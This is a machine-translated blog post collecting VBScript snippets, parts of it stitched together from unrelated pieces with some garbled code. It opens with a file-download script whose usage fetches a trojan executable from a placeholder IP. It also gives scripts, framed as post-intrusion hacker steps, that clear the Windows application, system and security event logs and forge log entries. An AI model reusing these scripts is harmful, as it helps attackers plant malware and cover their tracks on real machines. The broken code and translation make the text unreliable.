Collection of some classic vbs script encyclopedia

Time:2021-7-22

Record some classic VBS scripts  

1. File download (no echo)  
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe 
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe 
echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.vbe 
echo xPost.Open “GET”,iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = createObject(“ADODB.Stream”) >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe 

Usage:   cscript   hget.vbs   http://111.111.111.111/muma.exe   muma.exe  

2. List the process  
@echo for each ps in getobject _ >ps.vbs 
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>ps.vbs 
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs 

Usage: cscript   ps.vbs  

3. Terminate the process  
@echo for each ps in getobject _ >pskill.vbs 
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>pskill.vbs 
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs 

Usage: cscript   pskill.vbs   pid  

4. Restart the system  
@echo for each os in getobject _ >reboot.vbs 
@echo (“winmgmts:!\\.\root\cimv2:win32_operatingsystem”).instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs 

Usage: cscript   reboot.vbs  

Eight ingenious applications of vbs script in system security  
Vbs script virus a large number of popular, so that we have a new understanding of the VBS function, now we also began to pay attention to it. VBS code in the local is through windows   Script   The host (WSH) interprets the execution. The execution of vbs script cannot do without WSH. WSH is a script interpretation mechanism based on 32-bit windows platform and independent of language provided by Microsoft. It enables the script to run directly under Windows desktop or command prompt. With WSH, users can manipulate WSH objects, ActiveX objects, registry and file system. On Windows   In 2000, WSH can also be used to access windows   NT active directory service.  
   
The script program written in VBS is interpreted and executed by wscript.exe in the window interface and cscript.exe in the character interface. Wscript.exe is a script language interpreter, which makes scripts can be executed just like batch processing. You must be more familiar with VBS than I am, so no more nonsense, just go to the topic and have a look at the eight wonderful functions of VBS in system security that I summarized.  
   
1. Unlock the registry editor  
   
Edit the following in Notepad:  
   
  DIM WSH 
  SET   WSH=WSCRIPT.CreateObject(“WSCRIPT.SHELL”)  ‘ Activate wscript.shell object  
Wsh.pop (“unlock registry editor!”)  
‘display the pop-up message “unlock registry editor!”  
  WSH.Regwrite”HKCU\Software\Microsoft\Windows\CurrentVersion 
  \Policies\System\DisableRegistryTools”,0,”REG_DWORD” 
‘unlock Registry Editor  
Wsh.pop (“registry unlocked successfully!”)  
‘display the pop-up message “registry unlocked successfully!”  
Save as a file with. VBS extension, double-click when using.  
   
2. Close win   The default share of NT / 2000  
   
Edit the following in Notepad:  
   
  Dim   WSHShell ‘defines variables  
  set   WSHShell=CreateObject(“WScript.shell”)  ‘ Create an object WSHShell that can communicate with the operating system  
  Dim fso,dc 
  Set   FSO = create object (“scripting. Filesystem object”) ‘  
  set   dc=fso.Drives  ‘ Get all drive letters  
  For Each d in dc 
  Dim str 
  WSHShell.run(“net   share”&d.driveletter  &”$ / Delete ‘)’ turn off hidden sharing for all drives  
  next 
  WSHShell.run(“net share admin$ /delete”) 
  WSHShell.run(“net   share   ipc$  / Delete ‘)’ close the admin $and IPC $pipeline sharing  
   
Now let’s test it. First open cmd.exe and enter net   Share command can see the share on your own machine. Double click to execute stopshare.vbs, you will see the window flash by. Then enter net in CMD   Share command. At this time, no shared list is found  
   
3. Display the local IP address  
   
There are many times, we need to know the IP address of this machine. Although we can do it with various software, it is also very convenient to use vbs script. Edit the following in Notepad:  
   
  Dim WS 
  Set WS=CreateObject(“MSWinsock.Winsock”) 
  IPAddress=WS.LocalIP 
  MsgBox “Local IP=” & IPAddress 
   
Save the above content as showip.vbs, and double-click to get the local IP address.  
   
4. Using script programming to delete logs  
   
The first thing that hackers do after the successful intrusion system is to clear the log. It is not difficult to delete the log if they remotely control the other machine with a graphical interface or log in from the terminal. Although the log is also run as a service, it is different from services such as HTTP and FTP. You can stop and delete it at the command line, and use net at the command line   stop   Eventlog can’t be stopped, so some people think that it’s very difficult to delete logs from the command line. In fact, this is not the case. For example, using VMI in script programming can delete logs, which is very simple and convenient. The source code is as follows:  
   
  strComputer= “.” 
  Set objWMIService = GetObject(“winmgmts:” _ 
  & “{impersonationLevel=impersonate,(Backup)}!\\” & _ 
  strComputer & “\root\cimv2”) 
  dim mylogs(3) 
  mylogs(1)=”application” 
  mylogs(2)=”system” 
  mylogs(3)=”security” 
  for Each logs in mylogs 
  Set colLogFiles=objWMIService.ExecQuery _ 
  (“Select * from Win32_NTEventLogFile where LogFileName='”&logs&”‘”) 
  For Each objLogfile in colLogFiles 
  objLogFile.ClearEventLog() 
  Next 
  next 
   
Save the above code as cleanevent.vbs file. In the above code, first get the object object, and then delete the log by using its cleareventlog () method. Create an array, application, security, system. If there are other logs, you can also add them to the array. Then use a for loop to delete each element in the array, that is, each log.  
   
5. Using scripts to forge logs  
   
After deleting the log, any intelligent administrator will react to the empty log immediately. So a smart hacker will learn how to forge the log. Using the eventlog method in script programming to create logs is very simple. Please see the following code:  
   
  set ws=wscript.createobject(“Wscript.shell”) 
  ws.logevent   0  ,” write   log   success”  ‘ Create a success log  
   
Save the above code as createlog.vbs. This code is easy to understand. First, get a shell object of Wscript, and then use the logevent method of the shell object. Usage of logevent: logevent   eventtype,”description”  [, remote   System], where eventtype is the log type, and the following parameters can be used: 0 for successful execution, 1 for execution error, 2 for warning, 4 for information, 8 for successful audit, 16 for fault audit. So in the above code, change 0 to 1, 2, 4, 8 and 16, and the content in quotation marks is the log description. The log written by this method has a disadvantage, that is, it can only be written to the application log, and the log source can only be WSH, that is, windows   Scripting   Host, so can not play too much hidden role, here for your reference only.  
   
Vi. disable start menu options  
   
Edit the following in Notepad:  
   
  Dim ChangeStartMenu 
  Set ChangeStartMenu=WScript.CreateObject(“WScript.Shell”) 
  RegPath=”HKCR\Software\Microsoft\Windows\CurrentVersion\Policies\” 
  Type_Name=”REG_DWORD” 
  Key_Data=1 
   
  StartMenu_Run=”NoRun” 
  StartMenu_Find=”NoFind” 
  StartMenu_Close=”NoClose” 
   
  Sub Change(Argument) 
  ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name 
  MsgBox(“Success!”) 
  End Sub 
   
  Call   Change(StartMenu_ Run)  ‘ Disable the run function in the start menu  
  Call   Change(StartMenu_ Find)  ‘ Disable the find function in the start menu  
  Call   Change(StartMenu_ Close)  ‘ Disable the shut down function in the start menu  
   
Save the above code as changestartmenu.vbs file, double-click when using.  
   
7. Implementation of external procedures  
   
Edit the following in Notepad:  
   
  DIM objShell 
  set objShell=wscript.createObject(“wscript.shell”) 
  iReturn=objShell.Run(“cmd.exe /C set var=world”, 1, TRUE) 
   
Save as. VBS file. In this code, we first set an environment variable named VaR with the value of world. The user can use% COMSPEC% instead of cmd.exe, and the command: set   Var = world is changed to other commands, so that it can run any command.  
   
8. Restart the specified IIS service  
   
Edit the following in Notepad:  
   
  Const ADS_SERVICE_STOPPED = 1 
  Set objComputer = GetObject(“WinNT://MYCOMPUTER,computer”) 
  Set objService = objComputer.GetObject(“Service”,”MYSERVICE”) 
  If (objService.Status = ADS_SERVICE_STOPPED) Then 
  objService.Start 
  End If 
   
Save it in the root directory of Disk C under the name of startsvc. VBS. And execute through the following command: cscript   c:\startsvc.vbs。 After running, the IIS service item specified by you will be re opened.  
   
Finally, let’s talk about the prevention method of vbs script virus mentioned at the beginning. The execution of VBS virus cannot do without WSH. While bringing convenience to people, WSH also leaves an opportunity for the spread of the virus. Therefore, to prevent VBS virus, you can choose to uninstall WSH. Just open the control panel, find “add / Remove Programs”, click “windows setup”, double-click the “attachment” item, and then click “windows setup” in the open window   Scripting   Remove the “√” of the “host” item, and then click “OK” twice in succession to unload the WSH. Or, you can click “my computer” → “view” → “Folder Options”, in the pop-up dialog box, click “file type”, and then delete the mapping between VBS, VBE, JS, JSE file suffix and application program, which can achieve the purpose of preventing vbs script virus.  

When the absolute value of the last item is less than 0.000001, the calculation is stopped.  

Write the following VBScript program code:  

<HTML> 

< head > < title > calculate pi < / Title > < / head >  

< body > < H3 > calculate pi < / H3 > < HR >  

<INPUT   TYPE=”Button”   NAME=”Button1″   Value = “calculate” >  

<SCRIPT FOR=”Button1″ EVENT=”onClick” LANGUAGE=”VBScript”> 

k = 1: s = 1: t = 1: m = 1 

Figure 3-12   Calculate pi  
While Abs(t) > 0.0000001 

k = k + 2 

m = -m 

t = m / k 

s = s + t 

Wend 

MsgBox  ” PI=“  &  four  *  s  

</SCRIPT> 

</BODY> 

</HTML> 

Execute VBScript program, and the browser display is shown in Figure 3-12.  

Note: the program may take a long time to run.  

Only 30 bytes. What can I write?  

Recommended Today

VBS obtains the operating system and its version number

VBS obtains the operating system and its version number ? 1 2 3 4 5 6 7 8 9 10 11 12 ‘************************************** ‘*by r05e ‘* operating system and its version number ‘************************************** strComputer = “.” Set objWMIService = GetObject(“winmgmts:” _  & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”) Set colOperatingSystems = objWMIService.ExecQuery _  (“Select * from […]